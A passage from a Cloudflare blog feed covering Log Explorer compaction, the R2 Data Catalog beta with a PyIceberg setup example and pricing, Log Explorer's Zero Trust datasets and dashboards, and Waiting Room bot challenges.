log search at Cloudflare scale.</p><p>Log Explorer ingests logs from across Cloudflare’s vast global network, <a href="https://www.cloudflare.com/network"><u>spanning more than 330 cities in over 125 countries</u></a>. If Log Explorer were to write logs from our servers straight to R2, its storage would quickly fragment into a myriad of small files, rendering log queries prohibitively expensive.</p><p>Log Explorer’s strategy to avoid this fragmentation is threefold. First, it leverages Cloudflare’s data pipeline, which collects and batches logs from the edge, ultimately buffering each stream of logs in an internal system named <a href="https://blog.cloudflare.com/cloudflare-incident-on-november-14-2024-resulting-in-lost-logs/"><u>Buftee</u></a>. Second, log batches ingested from Buftee aren’t immediately committed to the transaction log; rather, Log Explorer stages commits for multiple batches in an intermediate area and “squashes” these commits before they’re written to the transaction log. Third, once log batches have been committed, a process called compaction merges them into larger files in the background.</p><p>While the open-source implementation of Delta Lake provides compaction out of the box, we soon encountered an issue when using it for our workloads. Stock compaction merges data files to a desired target size S by sorting the files in reverse order of their size and greedily filling bins of size S with them. By merging logs irrespective of their timestamps, this process distributed ingested batches randomly across merged files, destroying data locality. Despite compaction, a user querying for a specific time frame would still end up fetching hundreds or thousands of files from R2.</p><p>For this reason, we wrote a custom compaction algorithm that merges ingested batches in order of their minimum log timestamp, leveraging the min/max statistics mentioned previously. This algorithm reduced the number of overlaps between merged files by two orders of magnitude. As a result, we saw a significant improvement in query performance, with some large queries that had previously taken over a minute completing in just a few seconds.</p>
    <div>
      <h3>Follow along for more updates</h3>
      <a href="#follow-along-for-more-updates">
        
      </a>
    </div>
    <p>We're just getting started! We're actively working on even more powerful features to further enhance your experience with Log Explorer. <a href="https://blog.cloudflare.com/"><u>Subscribe to the blog</u></a> and keep an eye out for more updates in our <a href="https://developers.cloudflare.com/changelog/"><u>Change Log</u></a> to our observability and forensics offering soon.</p>
    <div>
      <h3>Get access to Log Explorer</h3>
      <a href="#get-access-to-log-explorer">
        
      </a>
    </div>
    <p>To get started with Log Explorer, <a href="https://www.cloudflare.com/application-services/products/log-explorer/">sign up here</a> or contact your account manager. You can also read more in our  <a href="https://developers.cloudflare.com/logs/log-explorer/"><u>Developer Documentation</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[undefined]]></category>
            <category><![CDATA[SIEM]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">kg7dxMzYcRnJdVFrxQmCw</guid>
            <dc:creator>Jen Sells</dc:creator>
            <dc:creator>Claudio Jolowicz</dc:creator>
        </item>
        <item>
            <title><![CDATA[R2 Data Catalog: Managed Apache Iceberg tables with zero egress fees]]></title>
            <link>https://blog.cloudflare.com/r2-data-catalog-public-beta/</link>
            <pubDate>Thu, 10 Apr 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ R2 Data Catalog is now in public beta: a managed Apache Iceberg data catalog built directly into your R2 bucket. ]]></description>
            <content:encoded><![CDATA[ <p><a href="https://iceberg.apache.org/"><u>Apache Iceberg</u></a> is quickly becoming the standard table format for querying large analytic datasets in <a href="https://www.cloudflare.com/learning/cloud/what-is-object-storage/">object storage</a>. We’re seeing this trend firsthand as more and more developers and data teams adopt Iceberg on <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>Cloudflare R2</u></a>. But until now, using Iceberg with R2 meant managing additional infrastructure or relying on external data catalogs.</p><p>So we’re fixing this. Today, we’re launching the <a href="https://developers.cloudflare.com/r2/data-catalog/"><u>R2 Data Catalog</u></a> in open beta, a managed Apache Iceberg catalog built directly into your Cloudflare R2 bucket.</p><p>If you’re not already familiar with it, Iceberg is an open table format built for large-scale analytics on datasets stored in object storage. With R2 Data Catalog, you get the database-like capabilities Iceberg is known for – <a href="https://en.wikipedia.org/wiki/ACID"><u>ACID</u></a> transactions, schema evolution, and efficient querying – without the overhead of managing your own external catalog.</p><p>R2 Data Catalog exposes a standard Iceberg REST catalog interface, so you can connect the engines you already use, like <a href="https://py.iceberg.apache.org/"><u>PyIceberg</u></a>, <a href="https://www.snowflake.com/"><u>Snowflake</u></a>, and <a href="https://spark.apache.org/"><u>Spark</u></a>. And, as always with R2, there are no egress fees, meaning that no matter which cloud or region your data is consumed from, you won’t have to worry about growing data transfer costs.</p><p>Ready to query data in R2 right now? Jump into the <a href="https://developers.cloudflare.com/r2/data-catalog/"><u>developer docs</u></a> and enable a data catalog on your R2 bucket in just a few clicks. Or keep reading to learn more about Iceberg, data catalogs, how metadata files work under the hood, and how to create your first Iceberg table.</p>
    <div>
      <h2>What is Apache Iceberg?</h2>
      <a href="#what-is-apache-iceberg">
        
      </a>
    </div>
    <p><a href="https://iceberg.apache.org/"><u>Apache Iceberg</u></a> is an open table format for analyzing large datasets in object storage. It brings database-like features – ACID transactions, time travel, and schema evolution – to files stored in formats like <a href="https://parquet.apache.org/"><u>Parquet</u></a> or <a href="https://orc.apache.org/"><u>ORC</u></a>.</p><p>Historically, data lakes were just collections of raw files in object storage. However, without a unified metadata layer, datasets could easily become corrupted, were difficult to evolve, and queries often required expensive full-table scans.</p><p>Iceberg solves these problems by:</p><ul><li><p>Providing ACID transactions for reliable, concurrent reads and writes.</p></li><li><p>Maintaining optimized metadata, so engines can skip irrelevant files and avoid unnecessary full-table scans.</p></li><li><p>Supporting schema evolution, allowing columns to be added, renamed, or dropped without rewriting existing data.</p></li></ul><p>Iceberg is already <a href="https://iceberg.apache.org/vendors/"><u>widely supported</u></a> by engines like Apache Spark, Trino, Snowflake, DuckDB, and ClickHouse, with a fast-growing community behind it.</p>
    <div>
      <h3>How Iceberg tables are stored</h3>
      <a href="#how-iceberg-tables-are-stored">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/779M4zsH5QnpDwlTORk1fo/38e7732ca0e20645507bdc0c628f671b/1.png" />
          </figure><p>Internally, an Iceberg table is a collection of data files (typically stored in columnar formats like Parquet or ORC) and metadata files (typically stored in JSON or <a href="https://avro.apache.org/"><u>Avro</u></a>) that describe table snapshots, schemas, and partition layouts.</p><p>To understand how query engines interact efficiently with Iceberg tables, it helps to look at an Iceberg metadata file (simplified):</p>
            <pre><code>{
  "format-version": 2,
  "table-uuid": "0195e49b-8f7c-7933-8b43-d2902c72720a",
  "location": "s3://my-bucket/warehouse/0195e49b-79ca/table",
  "current-schema-id": 0,
  "schemas": [
    {
      "schema-id": 0,
      "type": "struct",
      "fields": [
        { "id": 1, "name": "id", "required": false, "type": "long" },
        { "id": 2, "name": "data", "required": false, "type": "string" }
      ]
    }
  ],
  "current-snapshot-id": 3567362634015106507,
  "snapshots": [
    {
      "snapshot-id": 3567362634015106507,
      "sequence-number": 1,
      "timestamp-ms": 1743297158403,
      "manifest-list": "s3://my-bucket/warehouse/0195e49b-79ca/table/metadata/snap-3567362634015106507-0.avro",
      "summary": {},
      "schema-id": 0
    }
  ],
  "partition-specs": [{ "spec-id": 0, "fields": [] }]
}</code></pre>
            <p>A few of the important components are:</p><ul><li><p><code>schemas</code>: Iceberg tracks schema changes over time. Engines use schema information to safely read and write data without needing to rewrite underlying files.</p></li><li><p><code>snapshots</code>: Each snapshot references a specific set of data files that represent the state of the table at a point in time. This enables features like time travel.</p></li><li><p><code>partition-specs</code>: These define how the table is logically partitioned. Query engines leverage this information during planning to skip unnecessary partitions, greatly improving query performance.</p></li></ul><p>By reading Iceberg metadata, query engines can efficiently prune partitions, load only the relevant snapshots, and fetch only the data files it needs, resulting in faster queries.</p>
    <div>
      <h3>Why do you need a data catalog?</h3>
      <a href="#why-do-you-need-a-data-catalog">
        
      </a>
    </div>
    <p>Although the Iceberg data and metadata files themselves live directly in object storage (like <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a>), the list of tables and pointers to the current metadata need to be tracked centrally by a data catalog.</p><p>Think of a data catalog as a library's index system. While books (your data) are physically distributed across shelves (object storage), the index provides a single source of truth about what books exist, their locations, and their latest editions. Without this index, readers (query engines) would waste time searching for books, might access outdated versions, or could accidentally shelve new books in ways that make them unfindable.</p><p>Similarly, data catalogs ensure consistent, coordinated access, allowing multiple query engines to safely read from and write to the same tables without conflicts or data corruption.</p>
    <div>
      <h2>Create your first Iceberg table on R2</h2>
      <a href="#create-your-first-iceberg-table-on-r2">
        
      </a>
    </div>
    <p>Ready to try it out? Here’s a quick example using <a href="https://py.iceberg.apache.org/"><u>PyIceberg</u></a> and Python to get you started. For a detailed step-by-step guide, check out our <a href="https://developers.cloudflare.com/r2/data-catalog/get-started/"><u>developer docs</u></a>.</p><p>1. Enable R2 Data Catalog on your bucket:
</p>
            <pre><code>npx wrangler r2 bucket catalog enable my-bucket</code></pre>
            <p>Or use the Cloudflare dashboard: Navigate to <b>R2 Object Storage</b> &gt; <b>Settings</b> &gt; <b>R2 Data Catalog</b> and click <b>Enable</b>.</p><p>2. Create a <a href="https://developers.cloudflare.com/r2/api/s3/tokens/"><u>Cloudflare API token</u></a> with permissions for both R2 storage and the data catalog.</p><p>3. Install <a href="https://py.iceberg.apache.org/"><u>PyIceberg</u></a> and <a href="https://arrow.apache.org/docs/index.html"><u>PyArrow</u></a>, then open a Python shell or notebook:</p>
            <pre><code>pip install pyiceberg pyarrow</code></pre>
            <p>4. Connect to the catalog and create a table:</p>
            <pre><code>import pyarrow as pa
from pyiceberg.catalog.rest import RestCatalog

# Define catalog connection details (replace variables)
WAREHOUSE = "&lt;WAREHOUSE&gt;"
TOKEN = "&lt;TOKEN&gt;"
CATALOG_URI = "&lt;CATALOG_URI&gt;"

# Connect to R2 Data Catalog
catalog = RestCatalog(
    name="my_catalog",
    warehouse=WAREHOUSE,
    uri=CATALOG_URI,
    token=TOKEN,
)

# Create default namespace
catalog.create_namespace("default")

# Create simple PyArrow table
df = pa.table({
    "id": [1, 2, 3],
    "name": ["Alice", "Bob", "Charlie"],
})

# Create an Iceberg table
table = catalog.create_table(
    ("default", "my_table"),
    schema=df.schema,
)</code></pre>
            <p>You can now append more data or run queries, just as you would with any Apache Iceberg table.</p>
    <div>
      <h2>Pricing</h2>
      <a href="#pricing">
        
      </a>
    </div>
    <p>While R2 Data Catalog is in open beta, there will be no additional charges beyond standard R2 storage and operations costs incurred by query engines accessing data. <a href="https://r2-calculator.cloudflare.com/"><u>Storage pricing</u></a> for buckets with R2 Data Catalog enabled remains the same as standard R2 buckets – \$0.015 per GB-month. As always, egress directly from R2 buckets remains \$0.</p><p>In the future, we plan to introduce pricing for catalog operations (e.g., creating tables, retrieving table metadata, etc.) and data compaction.</p><p>Below is our current thinking on future pricing. We’ll communicate more details around timing well before billing begins, so you can confidently plan your workloads.</p><div>
    <figure>
        <table>
            <colgroup>
                <col></col>
                <col></col>
            </colgroup>
            <tbody>
                <tr>
                    <td> </td>
                    <td>
                        <p><span><span><strong>Pricing</strong></span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>R2 storage</span></span></p>
                        <p><span><span>For standard storage class</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$0.015 per GB-month (no change)</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>R2 Class A operations</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$4.50 per million operations (no change)</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>R2 Class B operations</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$0.36 per million operations (no change)</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Data Catalog operations</span></span></p>
                        <p><span><span>e.g., create table, get table metadata, update table properties</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$9.00 per million catalog operations</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Data Catalog compaction data processed</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$0.05 per GB processed</span></span></p>
                        <p><span><span>$4.00 per million objects processed</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Data egress</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$0 (no change, always free)</span></span></p>
                    </td>
                </tr>
            </tbody>
        </table>
    </figure>
</div>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We’re excited to see how you use R2 Data Catalog! If you’ve never worked with Iceberg – or even analytics data – before, we think this is the easiest way to get started.</p><p>Next on our roadmap is tackling compaction and table optimization. Query engines typically perform better when dealing with fewer, but larger data files. We will automatically re-write collections of small data files into larger files to deliver even faster query performance. </p><p>We’re also collaborating with the broad Apache Iceberg community to expand query-engine compatibility with the Iceberg REST Catalog spec.</p><p>We’d love your feedback. Join the <a href="https://discord.cloudflare.com/"><u>Cloudflare Developer Discord</u></a> to ask questions and share your thoughts during the public beta. For more details, examples, and guides, visit our <a href="https://developers.cloudflare.com/r2/data-catalog/get-started/"><u>developer documentation</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Data Catalog]]></category>
            <category><![CDATA[Storage]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">6JFB9cHUOoMZnVmYIuTLzd</guid>
            <dc:creator>Phillip Jones</dc:creator>
            <dc:creator>Garvit Gupta</dc:creator>
            <dc:creator>Alex Graham</dc:creator>
            <dc:creator>Garrett Gu</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare enables native monitoring and forensics with Log Explorer and custom dashboards]]></title>
            <link>https://blog.cloudflare.com/monitoring-and-forensics/</link>
            <pubDate>Tue, 18 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Today we are excited to announce support for Zero Trust datasets, and custom dashboards where customers can monitor critical metrics for suspicious or unusual activity.  ]]></description>
            <content:encoded><![CDATA[ <p>In 2024, we <a href="https://blog.cloudflare.com/log-explorer/"><u>announced Log Explorer</u></a>, giving customers the ability to store and query their HTTP and security event logs natively within the Cloudflare network. Today, we are excited to announce that Log Explorer now supports logs from our Zero Trust product suite. In addition, customers can create custom dashboards to monitor suspicious or unusual activity.</p><p>Every day, Cloudflare detects and protects customers against billions of threats, including DDoS attacks, bots, web application exploits, and more. SOC analysts, who are charged with keeping their companies safe from the growing spectre of Internet threats, may want to investigate these threats to gain additional insights on attacker behavior and protect against future attacks. Log Explorer, by collecting logs from various Cloudflare products, provides a single starting point for investigations. As a result, analysts can avoid forwarding logs to other tools, maximizing productivity and minimizing costs. Further, analysts can monitor signals specific to their organizations using custom dashboards.</p>
    <div>
      <h2>Zero Trust dataset support in Log Explorer</h2>
      <a href="#zero-trust-dataset-support-in-log-explorer">
        
      </a>
    </div>
    <p>Log Explorer stores your Cloudflare logs for a 30-day retention period so that you can analyze them natively and in a single interface, within the Cloudflare Dashboard. Cloudflare log data is diverse, reflecting the breadth of capabilities available.  For example, HTTP requests contain information about the client such as their IP address, request method, <a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/"><u>autonomous system (ASN)</u></a>, request paths, and TLS versions used. Additionally, Cloudflare’s Application Security <a href="https://developers.cloudflare.com/waf/detections/"><u>WAF Detections</u></a> enrich these HTTP request logs with additional context, such as the <a href="https://developers.cloudflare.com/waf/detections/attack-score/"><u>WAF attack score</u></a>, to identify threats.</p><p>Today we are announcing that seven additional Cloudflare product datasets are now available in Log Explorer. These seven datasets are the logs generated from our Zero Trust product suite, and include logs from <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/access_requests/"><u>Access</u></a>, <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/gateway_dns/"><u>Gateway DNS</u></a>, <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/gateway_http/"><u>Gateway HTTP</u></a>, <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/gateway_network/"><u>Gateway Network</u></a>, <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/casb_findings/"><u>CASB</u></a>, <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/zero_trust_network_sessions/"><u>Zero </u></a></p><p><a href="https://developers.cloudflare.com/logs/reference/log-fields/account/zero_trust_network_sessions/"><u>Trust Network Session</u></a>, and <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/device_posture_results/"><u>Device Posture Results</u></a>. Read on for examples of how to use these logs to identify common threats.</p>
    <div>
      <h3>Investigating unauthorized access</h3>
      <a href="#investigating-unauthorized-access">
        
      </a>
    </div>
    <p>By reviewing Access logs and HTTP request logs, we can reveal attempts to access resources or systems without proper permissions, including brute force password attacks, indicating potential security breaches or malicious activity.</p><p>Below, we filter Access Logs on the <code>Allowed</code> field, to see activity related to unauthorized access.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2piOIdnNz9OWskJqrZJfcf/f88673fc184c23de493920661020e7b3/access_requests.png" />
          </figure><p>By then reviewing the HTTP logs for the requests identified in the previous query, we can assess if bot networks are the source of unauthorized activity.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4b38nYNdpLbmHFt0BHkapa/88e1acf82d8bbc257a7cbbe102cbd723/http_requests.png" />
          </figure><p>With this information, you can craft targeted <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>Custom Rules</u></a> to block the offending traffic. </p>
    <div>
      <h3>Detecting malware</h3>
      <a href="#detecting-malware">
        
      </a>
    </div>
    <p>Cloudflare's <a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/"><u>Web Gateway</u></a> can track which websites users are accessing, allowing administrators to identify and block access to malicious or inappropriate sites. These logs can be used to detect if a user’s machine or account is compromised by malware attacks. When reviewing logs, this may become apparent when we look for records that show a rapid succession of attempts to browse known malicious sites, such as hostnames that have long strings of seemingly random characters that hide their true destination. In this example, we can query logs looking for requests to a spoofed YouTube URL.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Nkm4udjUw9tmzPk0Fk1eK/524dc1a6d4070a1f6cc9478e09b67ffd/gateway_requests.png" />
          </figure>
    <div>
      <h2>Monitoring what matters using custom dashboards</h2>
      <a href="#monitoring-what-matters-using-custom-dashboards">
        
      </a>
    </div>
    <p>Security monitoring is not one size fits all. For instance, companies in the retail or financial industries worry about fraud, while every company is concerned about data exfiltration, of information like trade secrets. And any form of personally identifiable information (PII) is a target for data breaches or ransomware attacks.</p><p>While log exploration helps you react to threats, our new custom dashboards allow you to define the specific metrics you need in order to monitor threats you are concerned about. </p><p>Getting started is easy, with the ability to create a chart using natural language. A natural language interface is integrated into the chart create/edit experience, enabling you to describe in your own words the chart you want to create. Similar to the <a href="https://blog.cloudflare.com/security-analytics-ai-assistant/"><u>AI Assistant</u></a> we announced during Security Week 2024, the prompt translates your language to the appropriate chart configuration, which can then be added to a new or existing custom dashboard.</p><ul><li><p><b>Use a prompt</b>: Enter a query like “Compare status code ranges over time”. The AI model decides the most appropriate visualization and constructs your chart configuration.</p></li><li><p><b>Customize your chart</b>: Select the chart elements manually, including the chart type, title, dataset to query, metrics, and filters. This option gives you full control over your chart’s structure. </p></li></ul><div>
  
</div>
<br /><p><sup><i>Video shows entering a natural language description of desired metric “compare status code ranges over time”, preview chart shown is a time series grouped by error code ranges, selects “add chart” to save to dashboard.</i></sup></p><p>For more help getting started, we have some pre-built templates that you can use for monitoring specific uses. Available templates currently include: </p><ul><li><p><b>Bot monitoring</b>: Identify automated traffic accessing your website</p></li><li><p><b>API Security:</b> Monitor the data transfer and exceptions of API endpoints within your application</p></li><li><p><b>API Performance</b>: See timing data for API endpoints in your application, along with error rates</p></li><li><p><b>Account Takeover:</b> View login attempts, usage of leaked credentials, and identify account takeover attacks</p></li><li><p><b>Performance Monitoring</b>: Identify slow hosts and paths on your origin server, and view <a href="https://blog.cloudflare.com/ttfb-is-not-what-it-used-to-be/"><u>time to first byte (TTFB)</u></a> metrics over time</p></li></ul><p>Templates provide a good starting point, and once you create your dashboard, you can add or remove individual charts using the same natural language chart creator. </p><div>
  
</div>
<br /><p><sup><i>Video shows editing chart from an existing dashboard and moving individual charts via drag and drop.</i></sup></p>
    <div>
      <h3>Example use cases</h3>
      <a href="#example-use-cases">
        
      </a>
    </div>
    <p>Custom dashboards can be used to monitor for suspicious activity, or to keep an eye on performance and errors for your domains. Let’s explore some examples of suspicious activity that we can monitor using custom dashboards.</p><p>Take, for example, our use case from above: investigating unauthorized access. With custom dashboards, you can create a dashboard using the <b>Account takeover</b> template to monitor for suspicious login activity related to your domain.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/72KBaEdr0bEn4SNwKOfPfJ/e28997b94630cf856d3924e9ba443063/image7.png" />
          </figure><p>As another example, spikes in requests or errors are common indicators that something is wrong, and they can sometimes be signals of suspicious activity. With the Performance Monitoring template, you can view origin response time and time to first byte metrics as well as monitor for common errors. For example, in this chart, the spikes in 404 errors could be an indication of an unauthorized scan of your endpoints.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3krBxVm8dB5pr5XEoHnVtK/44f682436c3d5a63baa1105987347433/image1.jpg" />
          </figure>
    <div>
      <h3>Seamlessly integrated into the Cloudflare platform</h3>
      <a href="#seamlessly-integrated-into-the-cloudflare-platform">
        
      </a>
    </div>
    <p>When using custom dashboards, if you observe a traffic pattern or spike in errors that you would like to further investigate, you can click the button to “View in Security Analytics” in order to drill down further into the data and craft custom WAF rules to mitigate the threat.  </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5XfvQ24bvDmnNKeInyA8eU/e96798a72e55fa454439f8b85197e02b/image2.png" />
          </figure><p>These tools, seamlessly integrated into the Cloudflare platform, will enable users to discover, investigate, and mitigate threats all in one place, reducing time to resolution and overall cost of ownership by eliminating the need to forward logs to third party security analysis tools. And because it is a native part of Cloudflare, you can immediately use the data from your investigation to craft targeted rules that will block these threats. </p>
    <div>
      <h2>What’s next</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>Stay tuned as we continue to develop more capabilities in the areas of <a href="https://www.cloudflare.com/learning/performance/what-is-observability/">observability and forensics</a>, with additional features including: </p><ul><li><p><b>Custom alerts</b>: create alerts based on specific metrics or anomalies</p></li><li><p><b>Scheduled query detections</b>: craft log queries and run them on a schedule to detect malicious activity</p></li><li><p><b>More integration</b>: further streamlining the journey between detect, investigate, and mitigate across the full Cloudflare platform.</p></li></ul>
    <div>
      <h2>How to get it</h2>
      <a href="#how-to-get-it">
        
      </a>
    </div>
    <p>Current Log Explorer beta users get immediate access to the new custom dashboards feature. Pricing will be made available to everyone during Q2 2025. Between now and then, these features continue to be available at no cost.</p><p>Let us know if you are interested in joining our Beta program by completing <a href="https://www.cloudflare.com/lp/log-explorer/"><u>this form</u></a>, and a member of our team will contact you.</p>
    <div>
      <h2>Watch on Cloudflare TV</h2>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Logs]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[undefined]]></category>
            <category><![CDATA[SIEM]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <guid isPermaLink="false">76XBFojN0mhfyCoz6VRe1G</guid>
            <dc:creator>Jen Sells</dc:creator>
        </item>
        <item>
            <title><![CDATA[Banish bots from your Waiting Room and improve wait times for real users]]></title>
            <link>https://blog.cloudflare.com/banish-bots-from-your-waiting-room-and-improve-wait-times-for-real-users/</link>
            <pubDate>Mon, 03 Mar 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare Waiting Room is improving the user experience through the addition of Turnstile and Session Revocation, keeping wait times low and protecting against bot traffic. ]]></description>
            <content:encoded><![CDATA[ <p>With <a href="https://www.cloudflare.com/application-services/products/waiting-room/?cf_target_id=80139F59125DEFCA9DD4FAF8C6C73D4F"><u>Cloudflare Waiting Room,</u></a> you can safeguard your site from traffic surges by placing visitors in a customizable, virtual queue. Previously, many site visitors waited in the queue alongside bots, only to find themselves competing for inventory once in the application. This competition is inherently unfair, as bots are much faster and more efficient than humans. As a result, humans inevitably lose out in these high-demand situations, unable to secure inventory before bots sweep it all up. This creates a frustrating experience for real customers, who feel powerless against the speed and automation of bots, leading to a diminished experience overall. Those days are over! Today, we are thrilled to announce the launch of two Waiting Room solutions that significantly improve the visitor experience.</p><p>Now, <b>all</b> Waiting Room customers can add an invisible <a href="https://www.cloudflare.com/application-services/products/turnstile/?cf_history_state=%7B%22guid%22%3A%22C255D9FF78CD46CDA4F76812EA68C350%22%2C%22historyId%22%3A21%2C%22targetId%22%3A%222734F402BB1100617F807DE827E8036D%22%7D"><u>Turnstile </u></a>challenge to their queueing page, robustly challenging traffic and gathering analytics on bot activity within their queue. With Advanced Waiting Rooms, you can select between an <a href="https://developers.cloudflare.com/turnstile/concepts/widget/#widget-types"><u>invisible, managed, or non-interactive widget mode</u></a>. But, we won’t just block these bots! Instead, traffic with definite bot signals that have failed the Turnstile challenge can be sent to an Infinite Queue, a completely customizable page that mimics a real user experience. This prolongs the time it takes bots to realize they have not actually joined the queue, wasting their resources without impacting real users. This feature not only protects your site against bots, but also reduces wait times and protects inventory by ensuring the queue only consists of genuine users. To offset the environmental impact of wasting bot resources, we’re contributing to a <a href="https://blog.cloudflare.com/cleaning-up-bad-bots/#planting-trees"><u>tree planting initiative</u></a>, helping to reduce the carbon footprint of inefficient bots. </p><p>The second solution we have launched to improve the visitor experience is Session Revocation, which allows you to end a user’s session based on an action, dynamically opening up spots and admitting users from the queue. This new capability allows you to integrate Waiting Room more seamlessly with your customer journey, resulting in increased throughput, decreased wait times, and increased fairness by giving more users the opportunity to make it through the queue during high demand events. </p><p>This feature has proven to be extremely impactful for our customers, including a large online retailer that frequently has high-demand limited edition product drops. A common challenge in this space is maximizing the number of customers who can make a purchase during a limited-time event, all while maintaining a fair and efficient system for everyone involved. Previously, this customer had to limit their users to only one item in the cart and force them to wait for a period of time after each checkout before allowing them to rejoin the queue. This led to an awkward experience for end users, longer wait times, and reduced site throughput. With session revocation, this online retailer can now end the user’s session immediately after a purchase is complete, placing the user back in the queue if applicable, <b>without </b>being forced to wait for a preset timeout period. This significantly improves the end user experience by reducing unnecessary wait times and streamlining the purchase process.</p><p>Let’s deep dive into these two capabilities and how they improve the overall user experience.</p>
    <div>
      <h3>How bots impact the Waiting Room user experience </h3>
      <a href="#how-bots-impact-the-waiting-room-user-experience">
        
      </a>
    </div>
    <p>Waiting Room is often used to protect sites from being overwhelmed by traffic surges during high demand online events. These high demand events, such as ticket or e-commerce product sales, attract both a deluge of genuine users, and sophisticated bots, such as scalper bots. This type of bot traffic is unique, as they can complete the checkout process or user journey much quicker than normal human traffic. Bots in the queue negatively affect the user experience by increasing wait times, as they often occupy multiple spots. Additionally, their behavior can exacerbate the issue — if they don't handle cookies properly, they fail to take their spot in the application when their turn comes, further preventing the queue from progressing smoothly. Once past the queue, bots can also contribute to inventory hoarding, as they often reserve or consume large quantities of stock without genuine intent to purchase. An <a href="https://www.nbcnews.com/tech/video-games/good-luck-finding-playstation-5-walmart-retailers-battle-fast-buying-b-rcna193"><u>example</u></a> of this is the PlayStation 5’s launch in November 2020. Due to high demand and production limitations during the COVID-19 pandemic, scalper bots bought up stock quickly, making it difficult for average consumers to purchase the console at retail prices. This led to extreme frustration for retailers and consumers as these bots drove the prices up significantly. </p>
    <div>
      <h3>Quantifying bot traffic to Waiting Room with an invisible Turnstile challenge</h3>
      <a href="#quantifying-bot-traffic-to-waiting-room-with-an-invisible-turnstile-challenge">
        
      </a>
    </div>
    <p>Waiting Room customers have long been curious about the nature of large traffic spikes. Historically, <a href="https://developers.cloudflare.com/bots/concepts/bot-score/"><u>bot scores</u></a> and <a href="https://developers.cloudflare.com/waf/reference/cloudflare-challenges/"><u>managed challenges</u></a> have been the primary methods of collecting this data and acting on it. While these can provide some insight into the distribution of traffic, the Turnstile invisible challenge gives us the ability to actively interrogate the browser, providing the most complete set of data on whether that browser is being operated by a human or a bot. </p><p>To start quantifying bot traffic to waiting rooms, we have added an invisible Turnstile challenge to all basic rooms. With the purchase of an Advanced Waiting Room, customers can select between invisible, managed, or non-interactive widget modes. This Turnstile team <a href="https://blog.cloudflare.com/guide-to-cloudflare-pages-and-turnstile-plugin/?_gl=1*1fb6wb0*_gcl_au*Mzg4NDc3ODA1LjE3MzY3ODc4NjI.*_ga*MTI5NDczNzY0Ny4xNzM0NzEyNjMx*_ga_SQCRB0TXZW*MTczODYwNDE5Ny4xNC4xLjE3Mzg2MDQ4MDIuMjUuMC4w/#step-2-embed-turnstile-widget"><u>blog post</u></a> has more details on the different widget modes.  </p><p>Waiting Room’s integration with Turnstile aims to protect your site with minimal impact to the user experience by placing a Turnstile challenge on your waiting room’s queuing page. Unlike a standard WAF challenge, the Waiting Room Turnstile challenge is presented only when the waiting room is queuing. This way, users won’t face any interruptions once they are past the queue and into the application. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3GLXMvDBi5jBTs9rxQXBin/e75077558061fd5afe0a0244d807814c/image8.png" />
